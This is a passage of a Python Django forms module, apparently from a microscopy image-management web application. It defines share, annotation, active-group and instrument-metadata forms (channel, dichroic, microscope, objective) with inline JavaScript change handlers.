'<img src="%s" /></span>'
) % help_button
help_expire = (
'<span class="tooltip" title="Expiry date: This date defines'
" when the share will stop being available. Date format:"
' YYYY-MM-DD."><img src="%s" /></span>'
) % help_button
#################################################################
# Non-model Form
class GlobalSearchForm(NonASCIIForm):
search_query = forms.CharField(widget=forms.TextInput(attrs={"size": 25}))
class ShareForm(NonASCIIForm):
def __init__(self, *args, **kwargs):
super(ShareForm, self).__init__(*args, **kwargs)
try:
if kwargs["initial"]["shareMembers"]:
pass
self.fields["members"] = ExperimenterModelMultipleChoiceField(
queryset=kwargs["initial"]["experimenters"],
initial=kwargs["initial"]["shareMembers"],
widget=forms.SelectMultiple(attrs={"size": 28}),
)
except Exception:
self.fields["members"] = ExperimenterModelMultipleChoiceField(
queryset=kwargs["initial"]["experimenters"],
widget=forms.SelectMultiple(attrs={"size": 28}),
)
self.fields.keyOrder = [
"message",
"expiration",
"enable",
"members",
] # , 'guests']
message = forms.CharField(widget=forms.Textarea(attrs={"rows": 5, "cols": 50}))
expiration = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 10}),
label="Expiry date",
help_text=help_expire,
required=False,
)
enable = forms.BooleanField(required=False, help_text=help_enable)
# guests = MultiEmailField(required=False,
# widget=forms.TextInput(attrs={'size':75}))
def clean_expiration(self):
if (
self.cleaned_data["expiration"] is not None
and len(self.cleaned_data["expiration"]) < 1
):
return None
if self.cleaned_data["expiration"] is not None:
d = str(self.cleaned_data["expiration"]).rsplit("-")
try:
date = datetime.datetime.strptime(
("%s-%s-%s" % (d[0], d[1], d[2])), "%Y-%m-%d"
)
except Exception:
raise forms.ValidationError("Date is in the wrong format. YY-MM-DD")
if time.mktime(date.timetuple()) <= time.time():
raise forms.ValidationError("Expiry date must be in the future.")
return self.cleaned_data["expiration"]
class BasketShareForm(ShareForm):
def __init__(self, *args, **kwargs):
super(BasketShareForm, self).__init__(*args, **kwargs)
try:
self.fields["image"] = GroupModelMultipleChoiceField(
queryset=kwargs["initial"]["images"],
initial=kwargs["initial"]["selected"],
widget=forms.SelectMultiple(attrs={"size": 10}),
)
except Exception:
self.fields["image"] = GroupModelMultipleChoiceField(
queryset=kwargs["initial"]["images"],
widget=forms.SelectMultiple(attrs={"size": 10}),
)
class ContainerForm(NonASCIIForm):
name = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
description = forms.CharField(
widget=forms.Textarea(attrs={"rows": 2, "cols": 49}), required=False
)
owner = forms.CharField(widget=forms.HiddenInput, required=False)
class ContainerNameForm(NonASCIIForm):
name = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
class ContainerDescriptionForm(NonASCIIForm):
description = forms.CharField(
widget=forms.Textarea(attrs={"rows": 3, "cols": 39}), required=False
)
class BaseAnnotationForm(NonASCIIForm):
"""
This is the superclass of the various forms used for annotating single or
multiple objects.
All these forms use hidden fields to specify the object(s) currently being
annotated.
"""
def __init__(self, *args, **kwargs):
super(BaseAnnotationForm, self).__init__(*args, **kwargs)
images = "images" in kwargs["initial"] and kwargs["initial"]["images"] or list()
if len(images) > 0:
try:
self.fields["image"] = ObjectModelMultipleChoiceField(
queryset=images,
initial=kwargs["initial"]["selected"]["images"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["image"] = ObjectModelMultipleChoiceField(
queryset=images,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
datasets = (
"datasets" in kwargs["initial"] and kwargs["initial"]["datasets"] or list()
)
if len(datasets) > 0:
try:
self.fields["dataset"] = ObjectModelMultipleChoiceField(
queryset=datasets,
initial=kwargs["initial"]["selected"]["datasets"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["dataset"] = ObjectModelMultipleChoiceField(
queryset=datasets,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
projects = (
"projects" in kwargs["initial"] and kwargs["initial"]["projects"] or list()
)
if len(projects) > 0:
try:
self.fields["project"] = ObjectModelMultipleChoiceField(
queryset=projects,
initial=kwargs["initial"]["selected"]["projects"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["project"] = ObjectModelMultipleChoiceField(
queryset=projects,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
screens = (
"screens" in kwargs["initial"] and kwargs["initial"]["screens"] or list()
)
if len(screens) > 0:
try:
self.fields["screen"] = ObjectModelMultipleChoiceField(
queryset=screens,
initial=kwargs["initial"]["selected"]["screens"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["screen"] = ObjectModelMultipleChoiceField(
queryset=screens,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
plates = "plates" in kwargs["initial"] and kwargs["initial"]["plates"] or list()
if len(plates) > 0:
try:
self.fields["plate"] = ObjectModelMultipleChoiceField(
queryset=plates,
initial=kwargs["initial"]["selected"]["plates"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["plate"] = ObjectModelMultipleChoiceField(
queryset=plates,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
acquisitions = (
"acquisitions" in kwargs["initial"]
and kwargs["initial"]["acquisitions"]
or list()
)
if len(acquisitions) > 0:
try:
self.fields["acquisition"] = ObjectModelMultipleChoiceField(
queryset=acquisitions,
initial=kwargs["initial"]["selected"]["acquisitions"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["acquisition"] = ObjectModelMultipleChoiceField(
queryset=acquisitions,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
wells = "wells" in kwargs["initial"] and kwargs["initial"]["wells"] or list()
if len(wells) > 0:
try:
self.fields["well"] = ObjectModelMultipleChoiceField(
queryset=wells,
initial=kwargs["initial"]["selected"]["wells"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["well"] = ObjectModelMultipleChoiceField(
queryset=wells,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
shares = "shares" in kwargs["initial"] and kwargs["initial"]["shares"] or list()
if len(shares) > 0:
try:
self.fields["share"] = ObjectModelMultipleChoiceField(
queryset=shares,
initial=kwargs["initial"]["selected"]["shares"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["share"] = ObjectModelMultipleChoiceField(
queryset=shares,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
class TagsAnnotationForm(BaseAnnotationForm):
"""
Form for annotating one or more objects with existing Tags or New tags
"""
def __init__(self, *args, **kwargs):
super(TagsAnnotationForm, self).__init__(*args, **kwargs)
tags = forms.CharField(required=False, widget=forms.HiddenInput)
def clean_tags(self):
data = self.cleaned_data["tags"]
if not data:
return []
try:
data = map(int, data.split(","))
except Exception:
raise forms.ValidationError()
return data
class NewTagsAnnotationForm(forms.Form):
""" Helper form for new tags """
tag = forms.CharField(required=True, widget=forms.HiddenInput)
description = forms.CharField(required=False, widget=forms.HiddenInput)
tagset = forms.IntegerField(min_value=1, required=False, widget=forms.HiddenInput)
NewTagsAnnotationFormSet = formset_factory(NewTagsAnnotationForm, extra=0)
class FilesAnnotationForm(BaseAnnotationForm):
def __init__(self, *args, **kwargs):
super(FilesAnnotationForm, self).__init__(*args, **kwargs)
self.fields["files"] = AnnotationModelMultipleChoiceField(
queryset=kwargs["initial"]["files"],
widget=forms.SelectMultiple(attrs={"size": 8, "class": "existing"}),
required=False,
)
annotation_file = forms.FileField(required=False)
class CommentAnnotationForm(BaseAnnotationForm):
comment = forms.CharField(widget=forms.Textarea(attrs={"rows": 2, "cols": 39}))
class ActiveGroupForm(forms.Form):
def __init__(self, *args, **kwargs):
super(ActiveGroupForm, self).__init__(*args, **kwargs)
try:
self.fields["active_group"] = GroupModelChoiceField(
queryset=kwargs["initial"]["mygroups"],
initial=kwargs["initial"]["activeGroup"],
empty_label=None,
widget=forms.Select(
attrs={
"onchange": (
"window.location.href='"
+ reverse(viewname="change_active_group")
+ "?url="
+ kwargs["initial"]["url"]
+ "&active_group='"
"+this.options[this.selectedIndex].value"
)
}
),
)
except Exception:
self.fields["active_group"] = GroupModelChoiceField(
queryset=kwargs["initial"]["mygroups"],
initial=kwargs["initial"]["activeGroup"],
empty_label=None,
widget=forms.Select(
attrs={
"onchange": (
"window.location.href='"
+ reverse(viewname="change_active_group")
+ "?active_group='"
"+this.options[this.selectedIndex].value"
)
}
),
)
self.fields.keyOrder = ["active_group"]
class WellIndexForm(forms.Form):
def __init__(self, *args, **kwargs):
super(WellIndexForm, self).__init__(*args, **kwargs)
rmin, rmax = kwargs["initial"]["range"]
choices = [(str(i), "Field#%i" % (i - rmin + 1)) for i in range(rmin, rmax + 1)]
self.fields["index"] = forms.ChoiceField(
choices=tuple(choices),
widget=forms.Select(
attrs={
"onchange": ("changeField(this.options[this.selectedIndex].value);")
}
),
)
self.fields.keyOrder = ["index"]
###############################
# METADATA FORMS
def save_metadata(obj, name, options=False):
s = "javascript:save_metadata(" + str(obj) + ", '" + name + "', "
if options:
s += "this.options[this.selectedIndex].value);"
else:
s += "this.value);"
return s
def set_widget_attrs(field, set_class=True):
field.widget.attrs["disabled"] = True
if set_class:
field.widget.attrs["class"] = "disabled-metadata"
class MetadataChannelForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataChannelForm, self).__init__(*args, **kwargs)
# Logical channel
# Name
logicalCh = kwargs["initial"]["logicalChannel"]
try:
if logicalCh is not None:
self.fields["name"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": save_metadata(logicalCh.id)}
),
initial=logicalCh.name,
required=False,
)
else:
self.fields["name"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
required=False,
)
set_widget_attrs(self.fields["name"])
except Exception:
self.fields["name"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["name"])
# excitationWave
try:
if logicalCh is not None:
self.fields["excitationWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=kwargs["initial"]["exWave"].getValue(),
label=("Excitation (%s)" % kwargs["initial"]["exWave"].getSymbol()),
required=False,
)
else:
self.fields["excitationWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
label="Excitation",
required=False,
)
set_widget_attrs(self.fields["excitationWave"])
except Exception:
self.fields["excitationWave"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Excitation",
required=False,
)
set_widget_attrs(self.fields["excitationWave"])
# emissionWave
try:
if logicalCh is not None:
self.fields["emissionWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=kwargs["initial"]["emWave"].getValue(),
label=("Emission (%s)" % kwargs["initial"]["emWave"].getSymbol()),
required=False,
)
else:
self.fields["emissionWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
label="Emission",
required=False,
)
set_widget_attrs(self.fields["emissionWave"])
except Exception:
self.fields["emissionWave"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Emission",
required=False,
)
set_widget_attrs(self.fields["emissionWave"])
# ndFilter
try:
if logicalCh is not None and logicalCh.ndFilter is not None:
self.fields["ndFilter"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=formatPercentFraction(logicalCh.ndFilter),
label="ND filter (%)",
required=False,
)
else:
self.fields["ndFilter"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
label="ND filter (%)",
required=False,
)
set_widget_attrs(self.fields["ndFilter"], set_class=False)
except Exception:
self.fields["ndFilter"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="ND filter (%)",
required=False,
)
set_widget_attrs(self.fields["ndFilter"], set_class=False)
# pinHoleSize
try:
if logicalCh is not None and logicalCh.pinHoleSize is not None:
self.fields["pinHoleSize"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=logicalCh.pinHoleSize.getValue(),
label=("Pin hole size (%s)" % logicalCh.pinHoleSize.getSymbol()),
required=False,
)
else:
self.fields["pinHoleSize"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
label="Pin hole size",
required=False,
)
set_widget_attrs(self.fields["pinHoleSize"], set_class=False)
except Exception:
self.fields["pinHoleSize"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pin hole size",
required=False,
)
set_widget_attrs(self.fields["pinHoleSize"], set_class=False)
# fluor
try:
if logicalCh is not None:
self.fields["fluor"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=logicalCh.fluor,
required=False,
)
else:
self.fields["fluor"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
required=False,
)
set_widget_attrs(self.fields["fluor"], set_class=False)
except Exception:
self.fields["fluor"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["fluor"], set_class=False)
# Illumination
try:
if logicalCh.getIllumination() is not None:
self.fields["illumination"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["illuminations"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
logicalCh.id, "illumination", options=True
)
}
),
initial=logicalCh.getIllumination(),
required=False,
)
else:
self.fields["illumination"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["illuminations"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
logicalCh.id, "illumination", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["illumination"], set_class=False)
except Exception:
self.fields["illumination"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["illumination"], set_class=False)
# contrastMethods
try:
if logicalCh.contrastMethod is not None:
self.fields["contrastMethod"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["contrastMethods"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
logicalCh.id, "contrastMethod", options=True
)
}
),
initial=logicalCh.getContrastMethod(),
label="Contrast method",
required=False,
)
else:
self.fields["contrastMethod"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["contrastMethods"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
logicalCh.id, "contrastMethod", options=True
)
}
),
label="Contrast method",
required=False,
)
set_widget_attrs(self.fields["contrastMethod"])
except Exception:
self.fields["contrastMethod"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Contrast method",
required=False,
)
set_widget_attrs(self.fields["contrastMethod"])
# Mode
try:
if logicalCh.getMode() is not None:
self.fields["mode"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["modes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
logicalCh.id, "mode", options=True
)
}
),
initial=logicalCh.getMode().value,
required=False,
)
else:
self.fields["mode"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["modes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
logicalCh.id, "mode", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["mode"])
except Exception:
self.fields["mode"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["mode"])
# pockelCellSetting
try:
if logicalCh.pockelCellSetting is not None:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=logicalCh.pockelCellSetting,
label="Pockel cell",
required=False,
)
else:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
label="Pockel cell",
required=False,
)
set_widget_attrs(self.fields["pockelCellSetting"])
except Exception:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pockel cell",
required=False,
)
set_widget_attrs(self.fields["pockelCellSetting"])
self.fields.keyOrder = [
"name",
"excitationWave",
"emissionWave",
"ndFilter",
"pinHoleSize",
"fluor",
"illumination",
"contrastMethod",
"mode",
"pockelCellSetting",
]
class MetadataDichroicForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataDichroicForm, self).__init__(*args, **kwargs)
# Manufacturer
try:
if kwargs["initial"]["dichroic"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].id, "manufacturer"
),
}
),
initial=kwargs["initial"]["dichroic"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].id, "manufacturer"
),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Model
try:
if kwargs["initial"]["dichroic"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].id, "model"
),
}
),
initial=kwargs["initial"]["dichroic"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].id, "model"
),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# Serial number
try:
if kwargs["initial"]["dichroic"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].serialNumber,
"serialNumber",
),
}
),
initial=kwargs["initial"]["dichroic"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].serialNumber,
"serialNumber",
),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot number
try:
if kwargs["initial"]["dichroic"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].lotNumber, "lotNumber"
),
}
),
initial=kwargs["initial"]["dichroic"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].lotNumber, "lotNumber"
),
}
),
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
self.fields.keyOrder = ["model", "manufacturer", "serialNumber", "lotNumber"]
class MetadataMicroscopeForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataMicroscopeForm, self).__init__(*args, **kwargs)
# Model
try:
if kwargs["initial"]["microscope"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "model"
),
}
),
initial=kwargs["initial"]["microscope"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "model"
),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# Manufacturer
try:
if kwargs["initial"]["microscope"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "manufacturer"
),
}
),
initial=kwargs["initial"]["microscope"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "manufacturer"
),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Serial number
try:
if kwargs["initial"]["microscope"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "lotNumber"
),
}
),
initial=kwargs["initial"]["microscope"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "lotNumber"
),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot number
try:
if kwargs["initial"]["microscope"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "lotNumber"
),
}
),
initial=kwargs["initial"]["microscope"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "lotNumber"
),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
# Type
try:
if kwargs["initial"]["microscope"].getMicroscopeType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["microscopeTypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "type", options=True
)
}
),
initial=kwargs["initial"]["microscope"].getMicroscopeType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["microscopeTypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "type", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["type"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
]
class MetadataObjectiveForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataObjectiveForm, self).__init__(*args, **kwargs)
# Model
try:
if kwargs["initial"]["objective"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "model"
),
}
),
initial=kwargs["initial"]["objective"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "model"
),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# Manufacturer
try:
if kwargs["initial"]["objective"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "manufacturer"
),
}
),
initial=kwargs["initial"]["objective"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "manufacturer"
),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Serial Number
try:
if kwargs["initial"]["objective"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "serialNumber"
),
}
),
initial=kwargs["initial"]["objective"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "serialNumber"
),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot number
try:
if kwargs["initial"]["objective"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].lotNumber, "lotNumber"
),
}
),
initial=kwargs["initial"]["objective"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["logicalchannel"]
.getObjective()
.lotNumber,
"lotNumber",
),
}
),
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
# Nominal Magnification
try:
if kwargs["initial"]["objective"].nominalMagnification is not None:
self.fields["nominalMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"nominalMagnification",
),
}
),
initial=kwargs["initial"]["objective"].nominalMagnification,
label="Nominal magnification",
required=False,
)
else:
self.fields["nominalMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"nominalMagnification",
),
}
),
label="Nominal magnification",
required=False,
)
set_widget_attrs(self.fields["nominalMagnification"])
except Exception:
self.fields["nominalMagnification"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Nominal magnification",
required=False,
)
set_widget_attrs(self.fields["nominalMagnification"])
# Calibrated Magnification
try:
if kwargs["initial"]["objective"].calibratedMagnification is not None:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"calibratedMagnification",
),
}
),
initial=kwargs["initial"]["objective"].calibratedMagnification,
label="Calibrated magnification",
required=False,
)
else:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"calibratedMagnification",
),
}
),
label="Calibrated magnification",
required=False,
)
set_widget_attrs(self.fields["calibratedMagnification"])
except Exception:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Calibrated magnification",
required=False,
)
set_widget_attrs(self.fields["calibratedMagnification"])
# Lens NA
try:
if kwargs["initial"]["objective"].lensNA is not None:
